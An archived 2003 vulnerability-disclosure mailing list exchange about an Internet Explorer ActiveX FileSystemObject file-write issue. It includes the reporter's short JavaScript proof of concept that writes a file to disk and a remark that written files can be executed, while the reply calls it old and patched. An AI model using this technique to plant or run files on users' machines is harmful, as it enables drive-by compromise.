Vulnerability Development mailing list archives
RE: Internet Explorer JavaScript insecure function
From: "Scovetta, Michael V" <Michael.Scovetta () ca com>
Date: Mon, 8 Dec 2003 13:58:54 -0500
This is an old exploit, google "setCLSID" and you'll see a bunch of docs referencing this exploit. From what I gather, it's the result of some combination of a buggy WshShell, jscript.dll, and bad Internet-Zone security values. I believe Microsoft fixed this more than two years ago, as per: http://www.microsoft.com/technet/security/bulletin/MS01-015.asp (and probably others). If you're still using IE 5.x, you should just upgrade. I'm sure that there are many users still using 5.x browsers, but if you have it totally patched, this should not be exploitable. And WriteLine is an function of the ActiveX FileSystemObject, which has nothing to do with JavaScript-- JS only provides the ability to call ActiveX functions. I was unable to get this exploit to work, regardless of my security settings, using 6.0.2800.1106. Michael Scovetta -----Original Message----- From: FREEBRAIN [mailto:freebrain () unionnewbies net] Sent: Sunday, December 07, 2003 9:57 AM To: vuln-dev () securityfocus com Subject: Internet Explorer JavaScript insecure function * Internet Explorer JavaScript insecure function * Product: Microsoft Internet Explorer Version: 5.x (probabily other versions may be affected) *** Problem: I discovered a javascript function (interpreted by Internet Explorer) called "file.writeline()" may be potentially dangerous for Internet Explorer users. This function allows to write files by means of JavaScript on a hard disk. An attacker may use this function writting JavaScript code in posts of forums, guestbooks, etc for owning his victim's computers. With "file.writeline()" function the attacker can write trojans/virus/etc on his victim's hard disks, for example, an attacker may use JavaScript "file.writeline()" function for writting a malicious file in VBS (Visual Basic Scripting) language. I repeat, this may be potentially dangerous for Internet Explorer users. NOTE: Actually a virus in the wild that affects to mIRC users is using this function ("file.writeline"). NOTE2: As you can see on the "Proof of concept", other functions are needed to carry out an "intrusion". *** Proof of concept: InterfaceObject=document.applets[0]; setTimeout("Write()",1000); function Write() { fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}"; InterfaceObject.setCLSID(fsoClassID); fso = InterfaceObject.createInstance(); // windir = fso.getspecialfolder ; filename = "\\proof.txt"; var filecontent = "Hello world"; file = fso.opentextfile(filename, "2", "TRUE"); file.writeline(filecontent) file.close(); } This code writes a file called "proof.txt" in the hard disk, with the content "Hello world". Also you can execute files you write by means of JavaScript adding "Run();" to the function. *** Solution: I'm not sure about the solution but I recommend to upgrade to the last version of Internet Explorer. Also I recommend webmasters to forbid HTML codes that content this function in their forums, guestbooks, etc. *** Thanks to: #disidents,#hackers,#hacker @ irc-phoenix.org #disidents,#sleepx,#ayuda_internet @ irc-hispano.org Special thanks go to: Impos, |_Tr0mP4s (sorry my poor english) *** By FREEBRAIN FREEBRAIN is a member of DisidentS Hacker Team http://disidents-team.cjb.net (under construction) - http://www.gratisweb.com/disidents <freebrain () unionnewbies net> ( www.unionnewbies.net )
Current thread:
- Internet Explorer JavaScript insecure function FREEBRAIN (Dec 08)
- Re: Internet Explorer JavaScript insecure function npguy (Dec 09)
- <Possible follow-ups>
- RE: Internet Explorer JavaScript insecure function Scovetta, Michael V (Dec 08)